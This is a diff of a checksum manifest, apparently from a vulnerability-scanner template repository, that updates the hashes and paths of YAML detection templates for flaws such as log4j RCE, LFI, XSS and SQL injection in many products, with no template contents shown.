http/vulnerabilities/gnuboard/gnuboard-sms-xss.yaml:709b12efdefa0d64fe91f2a26ba9bda19f7d5730 http/vulnerabilities/gnuboard/gnuboard5-rxss.yaml:ba01958bf2ebd081f97638785af89481360284b6 http/vulnerabilities/gnuboard/gnuboard5-xss.yaml:3240beefccbd71d5f0cf63574a2f4c3743130425 http/vulnerabilities/grafana/grafana-file-read.yaml:b820257cd84b44c3e35b03c743514910c06453ab +http/vulnerabilities/hikvision-ivms-file-upload-rce.yaml:83c0a919fc21a55b9fa95bbd5a5ec903d1c9ccb6 http/vulnerabilities/httpbin/httpbin-open-redirect.yaml:c549b350d2610fdcc44e372a6b5a9d2986d311fe http/vulnerabilities/httpbin/httpbin-xss.yaml:66a928a2e82aa0a73e70dc5156af20dfd564915e -http/vulnerabilities/huawei/huawei-firewall-lfi.yaml:469e96b7619f1f73b9f4c5685c541db0a19f8dc5 +http/vulnerabilities/huawei/huawei-firewall-lfi.yaml:6ede30c087e76b15a7c9cadd72061b0ab8a5cff7 http/vulnerabilities/huawei/huawei-hg255s-lfi.yaml:4b356e0a1cc04eb28d8cb12eb1bcb2a9b4580e66 http/vulnerabilities/ibm/eclipse-help-system-xss.yaml:a30592cfcc4ffd7d47c5adafa0f136348bf1fa09 http/vulnerabilities/ibm/ibm-infoprint-lfi.yaml:af87aacb874c2f84e6ac6bfde47cb3f13947368f http/vulnerabilities/j2ee/liferay-resource-leak.yaml:dd84f56af773b44707457145f52181fb40268252 http/vulnerabilities/jamf/jamf-blind-xxe.yaml:cc45e2ff5e348a6e75bed81defa433ea4b3ddb03 -http/vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml:6a50b93be34614ad52021ab27b26e063d219d037 +http/vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml:0b5b44f9edccc83c6fb3294b2212cfb5446296c8 http/vulnerabilities/jenkins/jenkins-asyncpeople.yaml:115bf12effacf7906cfb494ace1b1f94ef094342 -http/vulnerabilities/jenkins/jenkins-script.yaml:cf09929debcf48e9813a130efb89531c7ad8a16e +http/vulnerabilities/jenkins/jenkins-script.yaml:6001f5d11381e9697539532f4fb76c573a4ea62a http/vulnerabilities/jenkins/jenkins-stack-trace.yaml:85dac33b39769c656a9bc46a0b179004e4e464bf http/vulnerabilities/jenkins/unauthenticated-jenkins.yaml:63f0cef2dbc4e9f8992041a6e65fbe37c9a10dca http/vulnerabilities/jira/jira-servicedesk-signup.yaml:89e391b373ffa6fcda924811cb0b47274848f425 @@ -5713,21 +5869,24 @@ http/vulnerabilities/jira/jira-unauthenticated-resolutions.yaml:2c518a580f881d8c http/vulnerabilities/jira/jira-unauthenticated-screens.yaml:cb84bd816e411ccabe0b240da3f406e8521caa07 http/vulnerabilities/jira/jira-unauthenticated-user-picker.yaml:8751cd9b769aa5cee9312c5a20d1a2d28d00e195 http/vulnerabilities/jolokia/jolokia-heap-info-disclosure.yaml:9d83d3d1e9839cd45bb507acf04d5411b6bd65cf -http/vulnerabilities/joomla/joomla-jvehicles-lfi.yaml:f967b2a1d5fb1afaf5440e7a876353f04caed3eb +http/vulnerabilities/joomla/joomla-jvehicles-lfi.yaml:b5f46181f7b11afdd7cc759db25641d979a5fa55 http/vulnerabilities/joomla/rusty-joomla.yaml:76f06e5c2b46da8f788aae181896f4c183561a4c http/vulnerabilities/laravel/laravel-ignition-xss.yaml:fd56462c0bdacebacebb940221b72661268ccc64 http/vulnerabilities/linkerd/linkerd-ssrf.yaml:dfe6bc7b2dbed477b9e577df220cd814551e11c3 -http/vulnerabilities/magento/magento-2-exposed-api.yaml:0e2b60f4a10fc4a204e6247baa7d98380a573427 +http/vulnerabilities/magento/magento-2-exposed-api.yaml:a6ca4bb40cabe0e7a896f24484575ca0ec8a0ab8 http/vulnerabilities/magento/magento-cacheleak.yaml:b614fcd0b0eb5ce758b424df900143bcbaf2aecb -http/vulnerabilities/magento/magento-unprotected-dev-files.yaml:293be3e6898b474e711faec8d315b16f44210fd8 +http/vulnerabilities/magento/magento-unprotected-dev-files.yaml:a180ef9cc5d33db45fc730145a79bb3753a63620 http/vulnerabilities/metersphere/metersphere-plugin-rce.yaml:9a5d9b23a4b1a9b2e8c3f0a933f49d4b92a921d9 -http/vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml:8ff8bb3116694ff4a066e3b567da0e99e8542b46 +http/vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml:770ca55e859c67560be971eaa3e529c2972f9675 http/vulnerabilities/moodle/moodle-filter-jmol-lfi.yaml:da241fa03735489b0f0e22030941742dfa0d7184 http/vulnerabilities/moodle/moodle-filter-jmol-xss.yaml:f969842379003830df45de48c0432b0549689532 http/vulnerabilities/moodle/moodle-xss.yaml:53cd626a91405078db0c74e3c962d7440f3caba7 http/vulnerabilities/netsweeper/netsweeper-open-redirect.yaml:0152a6db2c0de4d52f40d7ef29b50c0409a168c5 http/vulnerabilities/netsweeper/netsweeper-rxss.yaml:e73c18f42cccb3e869abe4db68f89d690b10814f http/vulnerabilities/nps/nps-auth-bypass.yaml:4d10c4d4199f3e410f50b641926d81ed455c2fb6 +http/vulnerabilities/nuxt/nuxt-js-lfi.yaml:2477330caa8c6bb865810820b8c929f2d2c93553 +http/vulnerabilities/nuxt/nuxt-js-semi-lfi.yaml:7974bb44a2dc2a4bf26348240d9bd4e1a2bb73c9 +http/vulnerabilities/nuxt/nuxt-js-xss.yaml:131b8cd24bc08a9563bdb809d9f577ead2c82289 http/vulnerabilities/opencpu/opencpu-rce.yaml:d21d3684b4382240134f40f9063a5108beaa8b67 http/vulnerabilities/oracle/oracle-ebs-bispgraph-file-access.yaml:4e5dfd356151ac9d738de65add773d534774243a http/vulnerabilities/oracle/oracle-ebs-xss.yaml:93d6a8ece5459a0e420533db8c01aaf1f21665b0 @@ -5736,7 +5895,7 @@ http/vulnerabilities/oscommerce/oscommerce-rce.yaml:8440dcb6a1419f1ea3b654af8a83 http/vulnerabilities/other/3cx-management-console.yaml:2782a541336d5f046d8b72f45e1c812b357d380e http/vulnerabilities/other/74cms-sqli.yaml:351644ce7369cf65af74024f1ff3dbbe23bb52ef http/vulnerabilities/other/WSO2-2019-0598.yaml:48b31deda76eb0e9e6329d7dfcc2082d4ed88408 -http/vulnerabilities/other/academy-lms-xss.yaml:88a85695a9b9fa4e8b5c0b560556c2ec9ab356d3 +http/vulnerabilities/other/academy-lms-xss.yaml:b1b03874c3c19c63d061e4c9865e537309f3d0c2 http/vulnerabilities/other/accent-microcomputers-lfi.yaml:e920bac54afd5ad679db1b1259d696e7548b6a1e http/vulnerabilities/other/acme-xss.yaml:797c5988efe9404502a38c689711de54c112b6b8 http/vulnerabilities/other/aerocms-sqli.yaml:72c7345ac15c99879c0df2431038e1c929017ccb @@ -5757,8 +5916,7 @@ http/vulnerabilities/other/carrental-xss.yaml:0c44fad01c1d4e64af99945d72a1dea0aa http/vulnerabilities/other/caucho-resin-info-disclosure.yaml:58afeb493d09acc7de94967327ff5cb680422d2f http/vulnerabilities/other/chamilo-lms-sqli.yaml:f19fc77708585fee0a45f9ec5d882829e83d9d24 http/vulnerabilities/other/chamilo-lms-xss.yaml:8207c6cf7bb7913a0ce35767e4e80c467daa6db5 -http/vulnerabilities/other/ckan-dom-based-xss.yaml:a1922fe3e113a041a9c102f065cff5a1a2dc77f4 -http/vulnerabilities/other/clockwatch-enterprise-rce.yaml:67c4a02fbc6455b622022ba0d435662d6347c4a7 +http/vulnerabilities/other/ckan-dom-based-xss.yaml:834507d9e630b988a0ebfbbb7539716cd1a3dd22 http/vulnerabilities/other/coldfusion-debug-xss.yaml:b7cea7b7df83d6e07272b1d6fc8b83eed5b0dbb0 http/vulnerabilities/other/commax-biometric-auth-bypass.yaml:41526da4746c8ec9caf6f78c82d37fc825430d4d http/vulnerabilities/other/commax-credentials-disclosure.yaml:d852a81e3efa3ad554c47eff47a3dba0b2c13cd7 @@ -5782,9 +5940,10 @@ http/vulnerabilities/other/ecshop-sqli.yaml:73f5fed58843e722365a151070cf40883d99 http/vulnerabilities/other/ecsimagingpacs-rce.yaml:f164d2d090a83ab477ca92b11aa98a03186de57b http/vulnerabilities/other/eibiz-lfi.yaml:96b942ff0274731b6424bbd1542ed0862a81a99c http/vulnerabilities/other/elFinder-path-traversal.yaml:3f161f7a05bb4b43f8e5cf4f97a2c994cb16ee7a -http/vulnerabilities/other/elasticsearch5-log4j-rce.yaml:abaee03a201aa0ee98555493c150cb152fe19f56 +http/vulnerabilities/other/elasticsearch5-log4j-rce.yaml:3ba77d5ed932c7afdd644938acb57af6296fcd06 http/vulnerabilities/other/empirecms-xss.yaml:c98eda14b3edc7ea3d0328836b887f386463221e http/vulnerabilities/other/ems-sqli.yaml:854eff7a218726135bd5f97558cd07ef099869af +http/vulnerabilities/other/epp-server-lfi.yaml:215a78ad771ccd54039602b9e26afebe163e1c58 http/vulnerabilities/other/eris-xss.yaml:e488a4c2c5a016f0b91887491c6511d03a239e9d http/vulnerabilities/other/etouch-v2-sqli.yaml:07d89214f2cd091a430bc30da7ca03629ef9f1ee http/vulnerabilities/other/ewebs-arbitrary-file-reading.yaml:c789621f6033b27a0334174b02bf243b28be47fc @@ -5802,9 +5961,9 @@ http/vulnerabilities/other/geovision-geowebserver-xss.yaml:05e886f4b196ca4468b0c http/vulnerabilities/other/global-domains-lfi.yaml:7879bb5ebfa5ce22ab62a03d1380ad620114d8c0 http/vulnerabilities/other/global-domains-xss.yaml:3c06529176eb0f5472b9a44082a23fb1a2c2c073 http/vulnerabilities/other/gloo-unauth.yaml:534b7e115718699591a88e421a722de3f3716ed9 -http/vulnerabilities/other/goanywhere-mft-log4j-rce.yaml:3df7a385677d12d8beed9bfdbeeb6d34802a92ef +http/vulnerabilities/other/goanywhere-mft-log4j-rce.yaml:77c38e3bef3d5f8c614e32c2855398159a1f2527 http/vulnerabilities/other/goip-1-lfi.yaml:cb16aea4f9c1d9206e40e479af77e8586e75768a -http/vulnerabilities/other/graylog-log4j.yaml:bbe19531b988a01c41ab454d024aeac0fddb9033 +http/vulnerabilities/other/graylog-log4j.yaml:6ce9efbb3992bd2c2e26f20565582903b2cb4797 http/vulnerabilities/other/groupoffice-lfi.yaml:429f0043fc8e7a43da6a593d8bff65e2acce13f0 http/vulnerabilities/other/gsoap-lfi.yaml:2cbdb97ef86a492e16f533496f7a75b3a2fe0396 http/vulnerabilities/other/h3c-imc-rce.yaml:0319ffebff503659176733403bc375d5a8c04046 @@ -5816,8 +5975,8 @@ http/vulnerabilities/other/hiboss-rce.yaml:ea2c6f85a500c622ed4d93be09682d8ddcdce http/vulnerabilities/other/hjtcloud-arbitrary-file-read.yaml:5823c06ba11f9da039b7cb6dfa99dd9d73d5e0c2 http/vulnerabilities/other/hjtcloud-rest-arbitrary-file-read.yaml:539343d19c945203ad6c61e1536e11630fbfe96c http/vulnerabilities/other/homeautomation-v3-openredirect.yaml:a88a43a16acd3c9110479a62ed27f51becf6332c -http/vulnerabilities/other/hospital-management-xss.yaml:9acff5f0e7b2980134bea564aa517536be7418c3 -http/vulnerabilities/other/hospital-management-xss2.yaml:1b7411e1b4ee29f5d0f80893eda2affb46d036ba +http/vulnerabilities/other/hospital-management-xss.yaml:4452a9eb0e1c8d910c14c71165a0d6728438312e +http/vulnerabilities/other/hospital-management-xss2.yaml:ff5b376a8b77a31ae3d9687b70085a865ac8e364 http/vulnerabilities/other/hrsale-unauthenticated-lfi.yaml:f5db66489aa5d252a6adec1de800f62f830d0899 http/vulnerabilities/other/huawei-hg659-lfi.yaml:3557fafe359719037a9c4536fb30f2e76400d621 http/vulnerabilities/other/huawei-router-auth-bypass.yaml:ae7a38304de60767c3ea744cbb6d7f7853852a80 @@ -5850,7 +6009,7 @@ http/vulnerabilities/other/luftguitar-arbitrary-file-upload.yaml:f846c1237f6ac8e http/vulnerabilities/other/maccmsv10-backdoor.yaml:8666388f39e954c3f5ab1f387ed6acd71751e0ae http/vulnerabilities/other/magicflow-lfi.yaml:21f220a7d9bb933281ef8d7fbc28f806c655dc43 http/vulnerabilities/other/mcafee-epo-rce.yaml:3f5974691e6637668f348445056149a20dbe958e -http/vulnerabilities/other/metabase-log4j.yaml:0f933147c58e6aee21f1d82d066756da599e701a +http/vulnerabilities/other/metabase-log4j.yaml:854f802d58d9c239ea3b71af07438766918bdffa http/vulnerabilities/other/metinfo-lfi.yaml:d3da71e8a50f94d9d44b4fd617274608c8c28d87 http/vulnerabilities/other/microstrategy-ssrf.yaml:e9020764a1afd972a044db4b9d3665d20c823e0d http/vulnerabilities/other/microweber-xss.yaml:60a4b475a6aecfc93c59eec122b247d7f312c868 @@ -5875,7 +6034,7 @@ http/vulnerabilities/other/odoo-cms-redirect.yaml:c7e97fd0ba88ac6835a7815ed88c8f http/vulnerabilities/other/oliver-library-lfi.yaml:a379f4962cedc3b129fe052164523395aa6422aa http/vulnerabilities/other/onlinefarm-management-xss.yaml:f90876ef02585030834ba700c7b688161a0a5588 http/vulnerabilities/other/opencti-lfi.yaml:3740c6c5e159e587e2ed902dc9a11fbb3e756c7d -http/vulnerabilities/other/opennms-log4j-jndi-rce.yaml:195c9db13b22562839b60d24dbd3e345b652bd28 +http/vulnerabilities/other/opennms-log4j-jndi-rce.yaml:c07d5d532ac995fab7534a9a9e18d79e3a575f8d http/vulnerabilities/other/opensis-lfi.yaml:5af89e7e23bf6bee117d03426b61c1865321caaa http/vulnerabilities/other/opensns-rce.yaml:ef410f4fe95a1c95d8bd5cbfb158326ab12e81c9 http/vulnerabilities/other/openvpn-hhi.yaml:63694e03bf5975ac1611ce628a23bb0ac0ca14d1 @@ -5894,7 +6053,7 @@ http/vulnerabilities/other/phpok-sqli.yaml:25fd423b41523b96a4b5ea3be350089d6ca4b http/vulnerabilities/other/phpwiki-lfi.yaml:c137452c056269f817fca08f156353b489a0d30a http/vulnerabilities/other/pmb-directory-traversal.yaml:1808a7ac8c06ad56e37537b36769bcf6543b5b5b http/vulnerabilities/other/pmb-local-file-disclosure.yaml:865bc664c200972a95beb04bf661c645bb511d43 -http/vulnerabilities/other/pmb-xss.yaml:b852b38b080c8e4b4f5c99a5ed3f16b05b9b8266 +http/vulnerabilities/other/pmb-xss.yaml:6ad3af68f0c6f81917d0140803326b5c1152eb54 http/vulnerabilities/other/pollbot-redirect.yaml:ccd015b5f5e58068672e379e307b4ea62c96b6b9 http/vulnerabilities/other/powercreator-cms-rce.yaml:e28aac40e0c60c9bf34c39978cc8ecb19d9ee004 http/vulnerabilities/other/processmaker-lfi.yaml:c09e4ec476dfe04fc84d01cca111da5348345eb9 @@ -5910,7 +6069,7 @@ http/vulnerabilities/other/resin-cnnvd-200705-315.yaml:4d3d645b58f506e86281f8dd0 http/vulnerabilities/other/resin-inputfile-fileread.yaml:99d1e9dc54f4ee317305d67f01721d137ddbd9d5 http/vulnerabilities/other/resin-viewfile-lfr.yaml:7de92f9c19448bcd34a9989dd162fa46334dd6e7 http/vulnerabilities/other/rockmongo-xss.yaml:51325e6c9dfc00e9b915e6727ceb60f05bc8aca0 -http/vulnerabilities/other/rundeck-log4j.yaml:6aeb9c0bcba1eeaba1e65bc00caaf0b98feb2d18 +http/vulnerabilities/other/rundeck-log4j.yaml:8ed0f5fd8cb88601cf94af5d570ecc4afd035fab http/vulnerabilities/other/sap-redirect.yaml:f92c53daa0009a91f8e56e0dc686bb762214bd2c http/vulnerabilities/other/sar2html-rce.yaml:c4b28eba7b955b47c1fc9557bd5c7f6b7bddfc19 http/vulnerabilities/other/seacms-rce.yaml:eaa2ae8e9b835a93b7a091a91f083e519ed4603c @@ -5920,14 +6079,14 @@ http/vulnerabilities/other/servicenow-helpdesk-credential.yaml:bcda3ec85d9430d88 http/vulnerabilities/other/sick-beard-xss.yaml:8b21d313bb67654f84283e831e366216070d05f4 http/vulnerabilities/other/siteminder-dom-xss.yaml:3e0fc47af7bcf6ee45a7931857d0ad479ec908ca http/vulnerabilities/other/sl-studio-lfi.yaml:160d0326c30a4148bd2e955eb489a54b3a5d57c2 -http/vulnerabilities/other/slims-xss.yaml:e91893bffebc9ce3872434c8c9cd55b324486ee4 +http/vulnerabilities/other/slims-xss.yaml:7e6bd25a7ce06bb760799dbdd6c50ffc76b32815 http/vulnerabilities/other/sofneta-mecdream-pacs-lfi.yaml:34bf57203c81c12e208ff2498d6a3209a7202ec5 http/vulnerabilities/other/solar-log-authbypass.yaml:5bf5fde8d6949711a6e7b65c8017dc0b877cbab7 http/vulnerabilities/other/solarview-compact-xss.yaml:7fc801d545081c095649a4e9bac756a5110923a1 http/vulnerabilities/other/sonicwall-sslvpn-shellshock.yaml:3d010722a42f99be4525d45547eb151a641ed140 -http/vulnerabilities/other/sound4-file-disclosure.yaml:014f9336c692f5928c7925ae2efaf37ee9e09f14 +http/vulnerabilities/other/sound4-file-disclosure.yaml:277c547bdfb65ff864cb0a916d081d8d80da3218 http/vulnerabilities/other/spark-webui-unauth.yaml:aa3f2f62a86d81bd989932daa108c77688661d2f -http/vulnerabilities/other/sponip-network-system-ping-rce.yaml:9181d3edb97729630cf0d2c1dafd1206e726fa36 +http/vulnerabilities/other/sponip-network-system-ping-rce.yaml:f93a6eb65f7c5ca2972d68de7bf025c131eddbef http/vulnerabilities/other/steve-xss.yaml:21a357ea4a24e91e05df58cb276dc68a5dffe118 http/vulnerabilities/other/surrealtodo-lfi.yaml:ccf5b3a4cb85ea6d0413a83b989ea4ed5077cc8b http/vulnerabilities/other/symantec-messaging-gateway.yaml:a03b046205ba4fd532ce91d6ed74507c2c8aa759 @@ -5937,7 +6096,7 @@ http/vulnerabilities/other/thinkific-redirect.yaml:dd27d639a910a8c4d4daca3623218 http/vulnerabilities/other/thruk-xss.yaml:4d417b86b81f61c2164cf2cdbf064acdd384720d http/vulnerabilities/other/tianqing-info-leak.yaml:ee38b520bd1fb652b0287d6b6de4d903b469bc7d http/vulnerabilities/other/tikiwiki-reflected-xss.yaml:4aef6418ddad6c8c2d676e32b684af9af7372691 -http/vulnerabilities/other/tikiwiki-xss.yaml:22e072307902ed7d709a859bfdd372e372b24382 +http/vulnerabilities/other/tikiwiki-xss.yaml:f680884f48c5aa420678dd425ee28a9b2c8491ce http/vulnerabilities/other/tpshop-directory-traversal.yaml:07cd48e65f461052f8452a2cef0d3eb997c5af36 http/vulnerabilities/other/turbocrm-xss.yaml:2629e0f671d660c54bbf8f5bb4ce16d90fb78655 http/vulnerabilities/other/twig-php-ssti.yaml:c43b73600f5f4909ad39e53c37f99c186456160d @@ -5945,10 +6104,10 @@ http/vulnerabilities/other/ueditor-file-upload.yaml:7a3d7b3af02a3be58a303edd8494 http/vulnerabilities/other/umbraco-base-ssrf.yaml:a0269db92a4348d3e3adfc20bcaf0f926314e005 http/vulnerabilities/other/unauth-hoteldruid-panel.yaml:68801d2150f73f3c05b2681dd9a11f9fceb762c6 http/vulnerabilities/other/unauth-spark-api.yaml:f32f198e95815090b9bf2a9896671194d2c53fb4 -http/vulnerabilities/other/unifi-network-log4j-rce.yaml:2576531ddf3396867f56257dba59e1cfa8e4202c +http/vulnerabilities/other/unifi-network-log4j-rce.yaml:7841aba84b67b2d6fae9d1ba5d1f07c392946244 http/vulnerabilities/other/vanguard-post-xss.yaml:a5938303ad8526d3b6c374ecddaf6f4d21c864c8 http/vulnerabilities/other/viewlinc-crlf-injection.yaml:0815d07a62e9cbb5011e07e9f6c21010ab5cafb8 -http/vulnerabilities/other/vmware-siterecovery-log4j-rce.yaml:b13970c6f2312af93cb602883a3c5abddc7bbf48 +http/vulnerabilities/other/vmware-siterecovery-log4j-rce.yaml:9a551f20b08199ea01ddf9f8a21a9dff0b1f44d1 http/vulnerabilities/other/vpms-auth-bypass.yaml:13883ef1c0577d85c1c71b193e01c073c52b6d93 http/vulnerabilities/other/wapples-firewall-lfi.yaml:3fd10989fff7aa51cd49f5d15daba69b3c61465e http/vulnerabilities/other/watchguard-credentials-disclosure.yaml:6d118091cce3f45965d341fe3f0c7bca8b14ce6f @@ -5962,17 +6121,17 @@ http/vulnerabilities/other/xerox-efi-lfi.yaml:08df63570f3024bee4e3b01e7ef74dd222 http/vulnerabilities/other/yapi-rce.yaml:57691e569537f29c47bbdef6c3780e9136f85c65 http/vulnerabilities/other/yarn-resourcemanager-rce.yaml:ae2d9ffef01305deff5ff99f220885476adcfa52 http/vulnerabilities/other/yeswiki-sql.yaml:d62cbfd76116aec05d5ff14bd54f50a74ab0c79b -http/vulnerabilities/other/yeswiki-stored-xss.yaml:53cc700b95cc14431d1ae5c1d4b0b86f5fe91519 +http/vulnerabilities/other/yeswiki-stored-xss.yaml:05bee293078194cbfc82ae49439b20a62224e6a8 http/vulnerabilities/other/yeswiki-xss.yaml:53adb0efa9242eeedd84ebb8fe91c2bb8ee052a2 http/vulnerabilities/other/yishaadmin-lfi.yaml:33e4e5405685552e3445d931b6dd990d966b09b2 http/vulnerabilities/other/zcms-v3-sqli.yaml:733ca8a7d5f6bb34ddcbe831644a019f1b34f410 http/vulnerabilities/other/zimbra-preauth-ssrf.yaml:8340932344698ceef67879053745dfb1b3334b53 http/vulnerabilities/other/zms-auth-bypass.yaml:57aa517099f16550077c36af1ee9208b80b2d60a http/vulnerabilities/other/zms-sqli.yaml:b14efa23f6eeaf7941ae4c8cc5d514377e653751 -http/vulnerabilities/other/zzcms-xss.yaml:2fa89c575ab614c45c6ef35e0275a80ce589bfe1 -http/vulnerabilities/others/universal-media-xss.yaml:5d728cd166c334093499d300d19b5c02b2fbbe27 +http/vulnerabilities/other/zzcms-xss.yaml:7a43b8efecd2030c318f6d1a82185d1651b88fab +http/vulnerabilities/others/universal-media-xss.yaml:6b0e96c4a85b79e6fd04d703052c370c5c53400c http/vulnerabilities/php/php-xdebug-rce.yaml:cf1ce0da8f7c4ea0a2905672df1113e8896c9863 -http/vulnerabilities/phpmyadmin-unauth.yaml:0512bfabbf10df0d075e04bb9db339b60df52798 +http/vulnerabilities/phpmyadmin-unauth.yaml:7e7904d758845b3bc5e2b41a776b4ec53297e9fa http/vulnerabilities/portainer-init-deploy.yaml:9d67545219dbc3c0acbb29d03c7ae92beed9ab01 http/vulnerabilities/qibocms-file-download.yaml:7763d29c8ae95f8db4ccb87330ef4ba17d612e87 http/vulnerabilities/rails/rails6-xss.yaml:9543de9254a36e71547873ceba8a6903cd40a082 @@ -5995,7 +6154,8 @@ http/vulnerabilities/seeyon/zhiyuan-file-upload.yaml:d0f1939b9fdd032136c1c551db6 http/vulnerabilities/seeyon/zhiyuan-oa-info-leak.yaml:4682cf1b5cd4d6eb1390de101c2e80ef9d1832ed http/vulnerabilities/seeyon/zhiyuan-oa-session-leak.yaml:206e69434dcd7c95483ca9d1c6d77238e5b51b2f http/vulnerabilities/simplecrm/simple-crm-sql-injection.yaml:92a75adaaca05b9c612e9b6188b595be6b340965 -http/vulnerabilities/splash/splash-render-ssrf.yaml:c453b8332b43e3f3c3c6c5c32c79abbb2ff7d55c +http/vulnerabilities/sitecore/sitecore-xml-xss.yaml:414d0c93f794d0a8fb943d2a9ae65feb54d8a350 +http/vulnerabilities/splash/splash-render-ssrf.yaml:ebc36380b220da7c0a2f6654da0706cc8cca1a9b http/vulnerabilities/springboot/springboot-actuators-jolokia-xxe.yaml:23a9d66f61a0d2e221d10633b36c41eaca9c6f9d http/vulnerabilities/springboot/springboot-h2-db-rce.yaml:f5493f5f944833e72d54a4f3e2f5eb28dd0b0961 http/vulnerabilities/springboot/springboot-log4j-rce.yaml:d90efd6782a4b794d53d7ce71c2ca15437fbfa31 @@ -6012,34 +6172,35 @@ http/vulnerabilities/thinkphp/thinkphp-5023-rce.yaml:729d0a92626be9800a198b53dae http/vulnerabilities/thinkphp/thinkphp-509-information-disclosure.yaml:ab357298992729dff05c31390ac5fdc322d9d050 http/vulnerabilities/tongda/tongda-path-traversal.yaml:90f4be943be226e49884a2799739ae37058f6da1 http/vulnerabilities/tongda/tongda-session-disclosure.yaml:9ab8de0c9ba380229cb61d4f749eaafea23f64c7 -http/vulnerabilities/ueditor/ueditor-ssrf.yaml:9c7ce8bda4f88afcd4a6aa2228ef5829a43c1932 -http/vulnerabilities/ueditor/ueditor-xss.yaml:b4ed0e105c2fd042755832adbce7e304e5a4e5ea +http/vulnerabilities/ueditor/ueditor-ssrf.yaml:59f1815fd6ff8314541d7c8b9a64766064ae2dcd +http/vulnerabilities/ueditor/ueditor-xss.yaml:1f3fd8ac6e5c9609feb4fe1af9076cfc55a08e49 +http/vulnerabilities/vbulletin/arcade-php-sqli.yaml:0525410ad7ce820e401f4ccc287476aa53371b0e http/vulnerabilities/videoxpert-lfi.yaml:836bb554cd7ec42e4a17fa9bae56fd2421ec2e39 http/vulnerabilities/vmware/vmware-cloud-xss.yaml:c0243e1d7832ef97c178ce2724abf50b6b46d1cb -http/vulnerabilities/vmware/vmware-hcx-log4j.yaml:b233f883cdf2045b10adc0fb72501f60d243d4a7 -http/vulnerabilities/vmware/vmware-horizon-log4j-jndi-rce.yaml:27010801d6b13b22f33c748a282ae186e00f8d32 -http/vulnerabilities/vmware/vmware-nsx-log4j.yaml:82188716ec6d6343906eb9c47c9001258b3d0f8d +http/vulnerabilities/vmware/vmware-hcx-log4j.yaml:405880ff0d7b2f086a86c89d146c869c8974d259 +http/vulnerabilities/vmware/vmware-horizon-log4j-jndi-rce.yaml:6ef519ca8acb3cbec8dac51386f40499af4c1740 +http/vulnerabilities/vmware/vmware-nsx-log4j.yaml:93ee210255fdfa653f4160babe50be74cab05577 http/vulnerabilities/vmware/vmware-nsx-stream-rce.yaml:b454005fe9d8e2dc985a0c8595a0ccee565c4f40 -http/vulnerabilities/vmware/vmware-operation-manager-log4j.yaml:774d38cbf2a22b602c8eab0515f9ae697684d871 +http/vulnerabilities/vmware/vmware-operation-manager-log4j.yaml:ac0fbdc5e0d02745052914ce017e38e5887173c3 http/vulnerabilities/vmware/vmware-vcenter-lfi-linux.yaml:66ac016878673d1e5eb2a757ee9f4db828d93825 http/vulnerabilities/vmware/vmware-vcenter-lfi.yaml:5a6fa7c5f845686f698d9c136094b9f5264622c9 http/vulnerabilities/vmware/vmware-vcenter-log4j-jndi-rce.yaml:3b77c5a78748dd232c83d52cb222e85dab541da8 -http/vulnerabilities/vmware/vmware-vcenter-ssrf.yaml:2ab1b48778e4f6f103ed674302eff592cfd65a25 -http/vulnerabilities/vmware/vrealize-operations-log4j-rce.yaml:c433e40e81f224db10038ff4b92794be29399ded +http/vulnerabilities/vmware/vmware-vcenter-ssrf.yaml:a74604d9701e772e3d49873a13ecc48cb8fc0f9a +http/vulnerabilities/vmware/vrealize-operations-log4j-rce.yaml:085b18ce9ee40ee5224279cf006f9aa4be09f3e3 http/vulnerabilities/weaver/ecology/ecology-arbitrary-file-upload.yaml:41b5d217366725503d63f0586ca2b7eb56c6a0cd http/vulnerabilities/weaver/ecology/ecology-filedownload-directory-traversal.yaml:d743b5d35583c2ba70d722850f0ee84727c5f79c -http/vulnerabilities/weaver/ecology/ecology-mysql-config.yaml:1c5ce7a01d387361586dae9f4e8e419a6b7193f6 +http/vulnerabilities/weaver/ecology/ecology-mysql-config.yaml:1320d348735dd65472613cefdac4c7618bd312dd http/vulnerabilities/weaver/ecology/ecology-springframework-directory-traversal.yaml:4b95fac76f2076e0d6fa32b767283a79c973fa96 http/vulnerabilities/weaver/ecology/ecology-syncuserinfo-sqli.yaml:00da963e7b9358c2484f73294ef22c46d5a4700f http/vulnerabilities/weaver/ecology/ecology-v8-sqli.yaml:2b74c0f775e54b912cbed34a4edc942b05a62478 http/vulnerabilities/weaver/oa-v9-uploads-file.yaml:92a7f992b42a1ba4b1ddc52b9f413bf28d3729c4 http/vulnerabilities/webp-server-go/webp-server-go-lfi.yaml:698b60f8afd96db24edaf1c10d5c7e50dbbc9488 -http/vulnerabilities/wordpress/3d-print-lite-xss.yaml:45f5984d453d840ed3f185d05619852f2ebe8935 -http/vulnerabilities/wordpress/3dprint-arbitrary-file-upload.yaml:efdc996add4694b93f53c927eb45d34efad06dd2 +http/vulnerabilities/wordpress/3d-print-lite-xss.yaml:c734362732a3c1589beda39fa1e2fdd1174f104f +http/vulnerabilities/wordpress/3dprint-arbitrary-file-upload.yaml:904248773cfa434f65196cd1303ef62da7c7f06f http/vulnerabilities/wordpress/404-to-301-xss.yaml:8b08b7ec58862e296d22a2adc5edbf2cf95f68fd http/vulnerabilities/wordpress/ad-widget-lfi.yaml:68a0e12c4220208e2e7beff128f61c600cfd4efc http/vulnerabilities/wordpress/advanced-access-manager-lfi.yaml:3d584706a4a3475ab7a82c8d653f4158a15e8115 -http/vulnerabilities/wordpress/advanced-booking-calendar-sqli.yaml:7e1322dfad0416f7a80dbb1075bd92d2ab1c9921 +http/vulnerabilities/wordpress/advanced-booking-calendar-sqli.yaml:971343a64bc5d110ef5798fc3b30813a00f90ee2 http/vulnerabilities/wordpress/age-gate-open-redirect.yaml:b852e0d1371d85ee159bcace4d7a322eeda6939e http/vulnerabilities/wordpress/age-gate-xss.yaml:6fa47a7e8aece52f13b2a3120f77bf83b006a4c0 http/vulnerabilities/wordpress/ait-csv-import-export-rce.yaml:95f9f240480f1fcce4386796c652bf0609d98260 @@ -6072,7 +6233,7 @@ http/vulnerabilities/wordpress/hb-audio-lfi.yaml:2bcf09a94fb532d68bfaf95a7d8e03b http/vulnerabilities/wordpress/health-check-lfi.yaml:d8e897d164a46f0f7a91cffc5c2fc96ef44f4c9e http/vulnerabilities/wordpress/hide-security-enhancer-lfi.yaml:99637533386f9fbe04fbe17ced9d71a096ef8ee5 http/vulnerabilities/wordpress/issuu-panel-lfi.yaml:e083d93a56b3860f0e493a1124e126d4468c29bd 